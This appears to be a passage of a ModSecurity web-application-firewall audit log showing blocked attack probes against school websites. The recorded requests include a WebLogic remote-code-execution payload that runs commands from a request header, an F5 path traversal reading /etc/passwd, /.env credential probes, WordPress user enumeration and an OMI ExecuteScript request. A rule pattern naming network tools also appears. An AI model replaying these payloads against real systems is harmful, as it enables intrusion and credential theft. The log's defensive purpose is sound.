obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); "); --a76a1020-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a76a1020-E-- --a76a1020-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\b(?:cmd(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:32){0,1}\\.exe\\b)|(?:ftp|n(?:c|et|map)|rcmd|telnet|w(?:guest|sh))\\.exe\\b)" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "60"] [id "211200"] [rev "3"] [msg "COMODO WAF: System Command Access||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: cmd.exe found within ARGS:handle: com.tangosol.coherence.mvel2.sh.shellsession(weblogic.work.executethread executethread =(weblogic.work.executethread) thread.currentthread() weblogic.work.workadapter adapter = executethread.getcurrentwork() java.lang.reflect.field field = adapter.getclass().getdeclaredfield(connectionhandler) field.setaccessible(true) object obj = field.get(adapter) weblogic.servlet.internal.servletrequestimpl req =(weblogic.servlet.internal.servletrequestimpl) obj.getclas..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747821584562097 2210 (- - -) Stopwatch2: 1747821584562097 2210; combined=782, p1=449, p2=305, p3=0, p4=0, p5=27, sr=71, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a76a1020-Z-- --d8213a2b-A-- [21/May/2025:17:34:23 +0700] aC2sL4v3pT1iV0OxjLQnBwAAAIc 103.236.140.4 56780 103.236.140.4 8181 --d8213a2b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 128.199.89.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 128.199.89.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d8213a2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8213a2b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747823663243637 4296 (- - -) Stopwatch2: 1747823663243637 4296; combined=2208, p1=632, p2=1541, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8213a2b-Z-- --48d1885a-A-- [21/May/2025:17:46:57 +0700] aC2vIXZGSt58M5vv3gm38AAAAAA 103.236.140.4 37628 103.236.140.4 8181 --48d1885a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --48d1885a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48d1885a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747824417144828 794 (- - -) Stopwatch2: 1747824417144828 794; combined=306, p1=267, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48d1885a-Z-- --9bc1351d-A-- [21/May/2025:18:07:54 +0700] aC20CiioYDAgD0WHUjTxtAAAAEY 103.236.140.4 52910 103.236.140.4 8181 --9bc1351d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 118.179.221.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.179.221.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9bc1351d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bc1351d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747825674931508 3405 (- - -) Stopwatch2: 1747825674931508 3405; combined=1429, p1=476, p2=920, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bc1351d-Z-- --62b71a73-A-- [21/May/2025:18:13:57 +0700] aC21dXZGSt58M5vv3gnFkQAAABE 103.236.140.4 57384 103.236.140.4 8181 --62b71a73-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.79.25.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.79.25.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --62b71a73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62b71a73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747826037742879 2781 (- - -) Stopwatch2: 1747826037742879 2781; combined=1225, p1=426, p2=768, p3=0, p4=0, p5=30, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62b71a73-Z-- --c166a371-A-- [21/May/2025:18:24:37 +0700] aC239SioYDAgD0WHUjT3IQAAAEw 103.236.140.4 36822 103.236.140.4 8181 --c166a371-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 157997103 --c166a371-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c166a371-E-- --c166a371-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747826677361067 2388 (- - -) Stopwatch2: 1747826677361067 2388; combined=610, p1=448, p2=117, p3=0, p4=0, p5=44, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c166a371-Z-- --cda0f83d-A-- [21/May/2025:18:24:38 +0700] aC239iioYDAgD0WHUjT3IwAAAFM 103.236.140.4 36822 103.236.140.4 8181 --cda0f83d-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/119.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 157997106 --cda0f83d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cda0f83d-E-- --cda0f83d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747826678313682 2243 (- - -) Stopwatch2: 1747826678313682 2243; combined=653, p1=441, p2=169, p3=0, p4=0, p5=42, sr=76, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cda0f83d-Z-- --94ce8b07-A-- [21/May/2025:18:34:55 +0700] aC26Xxpv_mIXt2pDBOpUmwAAANE 103.236.140.4 44226 103.236.140.4 8181 --94ce8b07-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 31.56.56.153 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.153 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --94ce8b07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94ce8b07-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747827295852805 862 (- - -) Stopwatch2: 1747827295852805 862; combined=342, p1=303, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94ce8b07-Z-- --d9ac0d3f-A-- [21/May/2025:18:53:18 +0700] aC2-rnZGSt58M5vv3gnXXgAAAAY 103.236.140.4 57618 103.236.140.4 8181 --d9ac0d3f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.90.229.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.90.229.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d9ac0d3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9ac0d3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747828398214458 3138 (- - -) Stopwatch2: 1747828398214458 3138; combined=1397, p1=413, p2=889, p3=0, p4=0, p5=95, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9ac0d3f-Z-- --9d9f5d77-A-- [21/May/2025:19:06:56 +0700] aC3B4Iv3pT1iV0OxjLREEwAAAI8 103.236.140.4 39368 103.236.140.4 8181 --9d9f5d77-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.97.201.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.97.201.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9d9f5d77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d9f5d77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747829216550658 2712 (- - -) Stopwatch2: 1747829216550658 2712; combined=1220, p1=411, p2=778, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d9f5d77-Z-- --f086f83c-A-- [21/May/2025:19:17:18 +0700] aC3ETov3pT1iV0OxjLRHOwAAAI4 103.236.140.4 46892 103.236.140.4 8181 --f086f83c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.156.92.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.156.92.159 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --f086f83c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f086f83c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747829838225537 768 (- - -) Stopwatch2: 1747829838225537 768; combined=300, p1=264, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f086f83c-Z-- --08d5656a-A-- [21/May/2025:19:17:19 +0700] aC3ETyioYDAgD0WHUjQJuAAAAFg 103.236.140.4 46904 103.236.140.4 8181 --08d5656a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.156.92.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.156.92.159 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --08d5656a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08d5656a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747829839014453 763 (- - -) Stopwatch2: 1747829839014453 763; combined=311, p1=266, p2=0, p3=0, p4=0, p5=44, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08d5656a-Z-- --65e52605-A-- [21/May/2025:19:48:05 +0700] aC3LhXZGSt58M5vv3gnz8wAAABc 103.236.140.4 57666 103.236.140.4 8181 --65e52605-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 154.82.171.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.82.171.234 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --65e52605-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65e52605-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747831685709144 4359 (- - -) Stopwatch2: 1747831685709144 4359; combined=2324, p1=606, p2=1683, p3=0, p4=0, p5=34, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65e52605-Z-- --9ce22950-A-- [21/May/2025:20:25:29 +0700] aC3USSioYDAgD0WHUjQiEwAAAFc 103.236.140.4 56452 103.236.140.4 8181 --9ce22950-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --9ce22950-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ce22950-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747833929343866 782 (- - -) Stopwatch2: 1747833929343866 782; combined=313, p1=274, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ce22950-Z-- --7d7edf59-A-- [21/May/2025:20:39:25 +0700] aC3XjXZGSt58M5vv3gkEVwAAABA 103.236.140.4 38290 103.236.140.4 8181 --7d7edf59-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 65.20.160.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 65.20.160.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7d7edf59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d7edf59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747834765681940 3111 (- - -) Stopwatch2: 1747834765681940 3111; combined=1257, p1=433, p2=798, p3=0, p4=0, p5=26, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d7edf59-Z-- --b3216e3d-A-- [21/May/2025:21:00:26 +0700] aC3cenZGSt58M5vv3gkLuQAAABg 103.236.140.4 53738 103.236.140.4 8181 --b3216e3d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --b3216e3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3216e3d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747836026317639 806 (- - -) Stopwatch2: 1747836026317639 806; combined=322, p1=274, p2=0, p3=0, p4=0, p5=47, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3216e3d-Z-- --960af14e-A-- [21/May/2025:21:09:04 +0700] aC3egBpv_mIXt2pDBOqOGgAAAMY 103.236.140.4 54084 103.236.140.4 8181 --960af14e-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1709 User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0 Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 168397115 --960af14e-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --960af14e-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --960af14e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s 